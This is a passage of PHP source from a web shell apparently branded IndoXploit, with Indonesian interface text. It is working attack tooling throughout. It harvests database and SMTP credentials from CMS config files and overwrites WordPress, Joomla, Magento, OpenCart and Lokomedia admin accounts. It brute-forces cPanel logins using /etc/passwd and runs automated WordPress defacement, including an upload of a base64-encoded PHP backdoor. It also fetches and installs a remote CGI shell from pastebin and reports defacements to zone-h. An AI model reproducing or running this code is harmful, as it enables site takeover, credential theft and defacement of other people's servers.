$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Joomla<br>";
if($site == '') {
echo "Sitename => <font color=purple>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "Sitename => $site<br>";
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=purple>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => <font color=purple>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Wordpress<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=purple>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "Login => <font color=purple>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Magento<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=purple>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
$dbname = ambilkata($config,"'DB_DATABASE', '","'");
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER', '","'");
if($target == '') {
$url_target = "Login => <font color=purple>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => OpenCart<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=purple>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = ambilkata($config,'server = "','"');
$dbuser = ambilkata($config,'username = "','"');
$dbpass = ambilkata($config,'password = "','"');
$dbname = ambilkata($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "Login => <font color=purple>error, gabisa ambil nama domain nyaa</font><br>";
if($target2 == '') {
$url_target2 = "Login => <font color=purple>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
} else {
$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=purple>gatau admin login nya dimana :p</font> ]<br>";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=purple>gatau admin login nya dimana :p</font> ]<br>";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Lokomedia<br>";
if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
echo $url_target2;
} else {
echo $url_target;
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=purple>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center>
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set User & Pass: <br>
<input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
<input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
</form>
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("
", $_POST['user_cp']);
$passcp = explode("
", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
$i++;
echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
}
}
}
}
if($i == 0) {
} else {
echo "<br>sukses nyolong ".$i." Cpanel by <font color=blue>IndoXploit.</font>";
}
} else {
echo "<center>
<form method='post'>
USER: <br>
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while($getu = fgets($_usercp)) {
if($getu == '' || !$_usercp) {
echo "<font color=purple>Can't read /etc/passwd</font>";
} else {
preg_match_all("/(.*?):x:/", $getu, $u);
foreach($u[1] as $user_cp) {
if(is_dir("/home/$user_cp/public_html")) {
echo "$user_cp
";
}
}
}
}
echo "</textarea><br>
PASS: <br>
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass($dir) {
$pass = "";
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
if(preg_match("/WordPress/", $ambil)) {
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."
";
} elseif(preg_match("/JConfig|joomla/", $ambil)) {
$pass .= ambilkata($ambil,"password = '","'")."
";
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."
";
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "','"')."
";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."
";
} elseif(preg_match("/client/", $ambil)) {
preg_match("/password=(.*)/", $ambil, $pass1);
if(preg_match('/"/', $pass1[1])) {
$pass1[1] = str_replace('"', "", $pass1[1]);
$pass .= $pass1[1]."
";
}
} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
$pass .= ambilkata($ambil,"db_password = '","'")."
";
}
}
echo $pass;
}
$cp_pass = cp_pass($dir);
echo $cp_pass;
echo "</textarea><br>
<input type='submit' name='crack' style='width: 450px;' value='Crack'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'smtp') {
echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
function scj($dir) {
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
$ambil = str_replace("$", "", $ambil);
if(preg_match("/JConfig|joomla/", $ambil)) {
$smtp_host = ambilkata($ambil,"smtphost = '","'");
$smtp_auth = ambilkata($ambil,"smtpauth = '","'");
$smtp_user = ambilkata($ambil,"smtpuser = '","'");
$smtp_pass = ambilkata($ambil,"smtppass = '","'");
$smtp_port = ambilkata($ambil,"smtpport = '","'");
$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
echo "SMTP Host: <font color=blue>$smtp_host</font><br>";
echo "SMTP port: <font color=blue>$smtp_port</font><br>";
echo "SMTP user: <font color=blue>$smtp_user</font><br>";
echo "SMTP pass: <font color=blue>$smtp_pass</font><br>";
echo "SMTP auth: <font color=blue>$smtp_auth</font><br>";
echo "SMTP secure: <font color=blue>$smtp_secure</font><br><br>";
}
}
}
$smpt_hunter = scj($dir);
echo $smpt_hunter;
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'auto_wp') {
if($_POST['hajar']) {
$title = htmlspecialchars($_POST['new_title']);
$pn_title = str_replace(" ", "-", $title);
if($_POST['cek_edit'] == "Y") {
$script = $_POST['edit_content'];
} else {
$script = $title;
}
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/WordPress/", $config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."posts";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
echo "<div style='margin: 5px auto;'>";
if($target == '') {
echo "URL: <font color=purple>error, gabisa ambil nama domain nya</font> -> ";
} else {
echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
}
if(!$update OR !$conn OR !$db) {
echo "<font color=purple>MySQL Error: ".mysql_error()."</font><br>";
} else {
echo "<font color=blue>sukses di ganti.</font><br>";
}
echo "</div>";
mysql_close($conn);
}
}
} else {
echo "<center>
<h1>Auto Edit Title+Content WordPress</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set Title: <br>
<input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
</form>
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'zoneh') {
if($_POST['submit']) {
$domain = explode("
", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
function zoneh($url,$nick) {
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
return curl_exec($ch);
curl_close($ch);
}
foreach($domain as $url) {
$zoneh = zoneh($url,$nick);
if(preg_match("/color=\"purple\">OK<\/font><\/li>/i", $zoneh)) {
echo "$url -> <font color=blue>OK</font><br>";
} else {
echo "$url -> <font color=purple>ERROR</font><br>";
}
}
} else {
echo "<center><form method='post'>
<u>Defacer</u>: <br>
<input type='text' name='nick' size='50' value='IndoXploit'><br>
<u>Domains</u>: <br>
<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
<input type='submit' name='submit' value='Submit' style='width: 450px;'>
</form>";
}
echo "</center>";
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'cgi') {
$cgi_dir = mkdir('idx_cgi', 0755);
$file_cgi = "idx_cgi/cgi.izo";
$isi_htcgi = "AddHandler cgi-script .izo";
$htcgi = fopen(".htaccess", "w");
$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
$cgi = fopen($file_cgi, "w");
fwrite($cgi, $cgi_script);
fwrite($htcgi, $isi_htcgi);
chmod($file_cgi, 0755);
echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'fake_root') {
ob_start();
function reverse($url) {
$ch = curl_init("http://domains.yougetsignal.com/domains.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
$resp = curl_exec($ch);
$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
$array = explode(",,", $resp);
unset($array[0]);
foreach($array as $lnk) {
$lnk = "http://$lnk";
$lnk = str_replace(",", "", $lnk);
echo $lnk."
";
ob_flush();
flush();
}
curl_close($ch);
}
function cek($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$resp = curl_exec($ch);
return $resp;
}
$cwd = getcwd();
$ambil_user = explode("/", $cwd);
$user = $ambil_user[2];
if($_POST['reverse']) {
$site = explode("
", $_POST['url']);
$file = $_POST['file'];
foreach($site as $url) {
$cek = cek("$url/~$user/$file");
if(preg_match("/hacked/i", $cek)) {
echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=blue>Fake Root!</font><br>";
}
}
} else {
echo "<center><form method='post'>
Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
Domain: <br>
<textarea style='width: 450px; height: 250px;' name='url'>";
reverse($_SERVER['HTTP_HOST']);
echo "</textarea><br>
<input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
</form><br>
NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'adminer') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
echo "<center><font color=purple>gagal buat file adminer</font></center>";
}
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'auto_dwp') {
if($_POST['auto_deface_wp']) {
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function lohgin($cek, $web, $userr, $pass, $wp_submit) {
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "$wp_submit",
"purpleirect_to" => "$web",
"testcookie" => "1",
);
$ch = curl_init($cek);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$scan = $_POST['link_config'];
$link_config = scandir($scan);
$script = htmlspecialchars($_POST['script']);
$user = "indoxploit";
$pass = "indoxploit";
$passx = md5($pass);
foreach($link_config as $dir_config) {
if(!is_file("$scan/$dir_config")) continue;
$config = file_get_contents("$scan/$dir_config");
if(preg_match("/WordPress/", $config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
echo "[-] <font color=purple>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "[+] $target <br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
if(!$conn OR !$db OR !$update) {
echo "[-] MySQL Error: <font color=purple>".mysql_error()."</font><br><br>";
mysql_close($conn);
} else {
$site = "$target/wp-login.php";
$site2 = "$target/wp-admin/theme-install.php?upload";
$b1 = anucurl($site2);
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
$b = lohgin($site, $site2, $user, $pass, $wp_sub);
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@$www",
"install-theme-submit" => "Install Now",
);
$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data3 = curl_exec($ch);
curl_close($ch);
$y = date("Y");
$m = date("m");
$namafile = "id.php";
$fpi = fopen($namafile,"w");
fputs($fpi,$script);
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = anucurl($as);
if(preg_match("#$script#is", $bs)) {
echo "[+] <font color='blue'>berhasil mepes...</font><br>";
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
} else {
echo "[-] <font color='purple'>gagal mepes...</font><br>";
echo "[!!] coba aja manual: <br>";
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
echo "[+] username: <font color=blue>$user</font><br>";
echo "[+] password: <font color=blue>$pass</font><br><br>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center><h1>WordPress Auto Deface</h1>
<form method='post'>
<input type='text' name='link_config' size='50' height='10' value='$dir'><br>
<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' requipurple><br>
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
</form>
<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
</center>";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'auto_dwp2') {
if($_POST['auto_deface_wp']) {
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION,true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function lohgin($cek, $web, $userr, $pass, $wp_submit) {
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "$wp_submit",
"purpleirect_to" => "$web",
"testcookie" => "1",
);
$ch = curl_init($cek);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$link = explode("
", $_POST['link']);
$script = htmlspecialchars($_POST['script']);
$user = "indoxploit";
$pass = "indoxploit";
$passx = md5($pass);
foreach($link as $dir_config) {
$config = anucurl($dir_config);
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
echo "[-] <font color=purple>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "[+] $target <br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
if(!$conn OR !$db OR !$update) {
echo "[-] MySQL Error: <font color=purple>".mysql_error()."</font><br><br>";
mysql_close($conn);
} else {
$site = "$target/wp-login.php";
$site2 = "$target/wp-admin/theme-install.php?upload";
$b1 = anucurl($site2);
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
$b = lohgin($site, $site2, $user, $pass, $wp_sub);
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
